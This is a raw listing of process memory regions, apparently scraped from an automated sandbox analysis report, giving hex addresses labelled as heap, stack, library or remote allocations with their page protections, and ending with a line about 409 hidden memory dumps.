page read and write
DB1EBBE000
stack
page read and write
DB1E6FE000
stack
page read and write
12510133000
heap
page read and write
12510E31000
heap
page read and write
2CA1A92C000
trusted library allocation
page read and write
1250DEC0000
heap
page read and write
1D4A9AF0000
heap
page read and write
A7917FE000
stack
page read and write
12510D48000
heap
page read and write
12510020000
remote allocation
page read and write
1250E280000
heap
page read and write
2CA13940000
heap
page read and write
1250FDB8000
heap
page read and write
1D4C3C62000
heap
page read and write
12510020000
remote allocation
page read and write
125100C8000
heap
page read and write
1D4ABC40000
trusted library allocation
page read and write
12510C4A000
heap
page read and write
1250FD77000
heap
page read and write
2CA15A6A000
trusted library allocation
page read and write
12510080000
heap
page read and write
2CA1B32C000
trusted library allocation
page read and write
7DF4D1750000
trusted library allocation
page execute and read and write
1250FD86000
heap
page read and write
1250FD9E000
heap
page read and write
1250FDC5000
heap
page read and write
125100DB000
heap
page read and write
12510CAE000
heap
page read and write
1D4A9E50000
heap
page read and write
12510390000
heap
page read and write
1D4AB6E0000
heap
page execute and read and write
1250E0B9000
heap
page read and write
1D4AB6B0000
heap
page execute and read and write
2CA26D88000
trusted library allocation
page read and write
1250FDA0000
heap
page read and write
1D4A9CE0000
heap
page read and write
125100DC000
heap
page read and write
125100A1000
heap
page read and write
7FFE169D0000
trusted library allocation
page read and write
1D4BBB20000
trusted library allocation
page read and write
DB1E1E3000
stack
page read and write
1250E0AD000
heap
page read and write
1D4A9B38000
heap
page read and write
12510C16000
heap
page read and write
1250FD73000
heap
page read and write
12510B60000
heap
page read and write
7FFE16990000
trusted library allocation
page read and write
12510CB1000
heap
page read and write
2CA19F2C000
trusted library allocation
page read and write
2CA182EB000
trusted library allocation
page read and write
12510020000
remote allocation
page read and write
7FFE16810000
trusted library allocation
page read and write
A79177E000
stack
page read and write
2CA13A40000
heap
page read and write
125100C8000
heap
page read and write
1D4A9CC0000
heap
page read and write
1250DFA0000
heap
page read and write
12FDAFE000
stack
page read and write
DB1E67E000
stack
page read and write
12510BAF000
heap
page read and write
7FFE16A20000
trusted library allocation
page read and write
1D4C3CF2000
heap
page read and write
A7913E3000
stack
page read and write
1D4C3E66000
heap
page read and write
DB1EB3E000
stack
page read and write
1D4AB680000
heap
page execute and read and write
2CA152E0000
heap
page execute and read and write
1250FD74000
heap
page read and write
7FFE16770000
trusted library allocation
page read and write
DB1F60E000
stack
page read and write
12510CAE000
heap
page read and write
1250FD86000
heap
page read and write
7FFE16909000
trusted library allocation
page read and write
1250E0E2000
heap
page read and write
1D4AB7C6000
heap
page read and write
1250E285000
heap
page read and write
12510E31000
heap
page read and write
7FFE16914000
trusted library allocation
page read and write
1D4C3D12000
heap
page read and write
2CA15A86000
trusted library allocation
page read and write
125100D0000
heap
page read and write
1250FD81000
heap
page read and write
12FE2FB000
stack
page read and write
1D4A9B80000
heap
page read and write
2CA15A75000
trusted library allocation
page read and write
12FDBFE000
stack
page read and write
2CA15AAE000
trusted library allocation
page read and write
1250FD70000
heap
page read and write
2CA138E0000
heap
page read and write
1250FD9E000
heap
page read and write
1250FD9E000
heap
page read and write
125100E7000
heap
page read and write
12510CAE000
heap
page read and write
1D4C3E84000
heap
page read and write
1250E082000
heap
page read and write
1250FD7D000
heap
page read and write
7FFE16820000
trusted library allocation
page execute and read and write
7FFE16AA0000
trusted library allocation
page read and write
7FFE169F0000
trusted library allocation
page read and write
A79187C000
stack
page read and write
125100DC000
heap
page read and write
12510D90000
heap
page read and write
2CA256FF000
trusted library allocation
page read and write
1D4ABB7C000
trusted library allocation
page read and write
2CA15AAA000
trusted library allocation
page read and write
1250E0C6000
heap
page read and write
12510CC0000
heap
page read and write
12510E47000
heap
page read and write
12510CAE000
heap
page read and write
2CA15346000
heap
page read and write
2CA15711000
trusted library allocation
page read and write
12FDFFE000
stack
page read and write
1D4A9D60000
trusted library allocation
page read and write
A791E3E000
stack
page read and write
1D4ABBAB000
trusted library allocation
page read and write
12510D41000
heap
page read and write
2CA15AE7000
trusted library allocation
page read and write
1250FD7E000
heap
page read and write
12510730000
heap
page read and write
DB1F68D000
stack
page read and write
12510B68000
heap
page read and write
1250E0A3000
heap
page read and write
DB1E4FE000
stack
page read and write
2CA1952C000
trusted library allocation
page read and write
12FDEFE000
stack
page read and write
1D4C3D0D000
heap
page read and write
1250E03D000
heap
page read and write
1D4ABF23000
trusted library allocation
page read and write
2CA164EB000
trusted library allocation
page read and write
12510D40000
heap
page read and write
1D4ABC46000
trusted library allocation
page read and write
12510143000
heap
page read and write
1D4A9E55000
heap
page read and write
1D4AC234000
trusted library allocation
page read and write
1250FD9E000
heap
page read and write
1250FD8A000
heap
page read and write
7FFE16A70000
trusted library allocation
page read and write
DB1EABE000
stack
page read and write
2CA136F0000
heap
page read and write
1D4ABF6B000
trusted library allocation
page read and write
1250FDC5000
heap
page read and write
2CA13900000
heap
page read and write
2CA152D0000
heap
page read and write
1D4A9B46000
heap
page read and write
1D4AC0D3000
trusted library allocation
page read and write
1D4ABB11000
trusted library allocation
page read and write
1250E03D000
heap
page read and write
2CA16EEB000
trusted library allocation
page read and write
1250E02A000
heap
page read and write
7FFE16920000
trusted library allocation
page execute and read and write
12510DDE000
heap
page read and write
DB1E83E000
stack
page read and write
1250FD91000
heap
page read and write
1D4AB687000
heap
page execute and read and write
1250FD9E000
heap
page read and write
125100D2000
heap
page read and write
7FFE16816000
trusted library allocation
page read and write
A79167E000
stack
page read and write
DB1E57E000
stack
page read and write
12510BAF000
heap
page read and write
12510173000
heap
page read and write
12FDDFE000
stack
page read and write
12510530000
heap
page read and write
1D4C3E20000
heap
page read and write
1250E03D000
heap
page read and write
1D4C3C88000
heap
page read and write
1D4C4080000
heap
page read and write
2CA13980000
trusted library allocation
page read and write
1250E087000
heap
page read and write
12510B66000
heap
page read and write
7FFE16911000
trusted library allocation
page read and write
DB1EA3E000
stack
page read and write
2CA18CEB000
trusted library allocation
page read and write
7FFE16A60000
trusted library allocation
page read and write
12510173000
heap
page read and write
1250E0F3000
heap
page read and write
12510143000
heap
page read and write
1250FD75000
heap
page read and write
1250E05A000
heap
page read and write
1250FD97000
heap
page read and write
1250FD84000
heap
page read and write
1250E030000
heap
page read and write
1D4ABB2F000
trusted library allocation
page read and write
2CA139B0000
heap
page readonly
A791ABF000
stack
page read and write
1D4C3C2D000
heap
page read and write
1250FD75000
heap
page read and write
12510BAF000
heap
page read and write
12510CAE000
heap
page read and write
1D4A9DC0000
heap
page read and write
12510B77000
heap
page read and write
12510B63000
heap
page read and write
1250E04E000
heap
page read and write
1D4AB7CC000
heap
page read and write
1250FD9E000
heap
page read and write
125100EC000
heap
page read and write
12510B5A000
heap
page read and write
12510B8D000
heap
page read and write
2CA13710000
heap
page read and write
7FFE16900000
trusted library allocation
page read and write
1D4ABC32000
trusted library allocation
page read and write
1D4AC0AB000
trusted library allocation
page read and write
1250FD7A000
heap
page read and write
125100D4000
heap
page read and write
1D4ABC43000
trusted library allocation
page read and write
1D4C3C20000
heap
page read and write
7FFE169A0000
trusted library allocation
page read and write
12FE3FE000
stack
page read and write
1250E0C6000
heap
page read and write
1D4ABEFA000
trusted library allocation
page read and write
12510133000
heap
page read and write
1250E082000
heap
page read and write
12510CAE000
heap
page read and write
DB1E7F9000
stack
page read and write
7FFE169C0000
trusted library allocation
page read and write
1250E03F000
heap
page read and write
125100F1000
heap
page read and write
1250E08B000
heap
page read and write
2CA13A45000
heap
page read and write
1250E05A000
heap
page read and write
1250E068000
heap
page read and write
1250E0AD000
heap
page read and write
1250FD71000
heap
page read and write
125102B0000
heap
page read and write
1D4ABB39000
trusted library allocation
page read and write
1250FD9E000
heap
page read and write
1250E08D000
heap
page read and write
1D4BBB7F000
trusted library allocation
page read and write
125100FE000
heap
page read and write
125100C8000
heap
page read and write
7FFE169E0000
trusted library allocation
page read and write
7FFE16970000
trusted library allocation
page read and write
2CA13776000
heap
page read and write
12510205000
heap
page read and write
There are 409 hidden memdumps, click here to show them.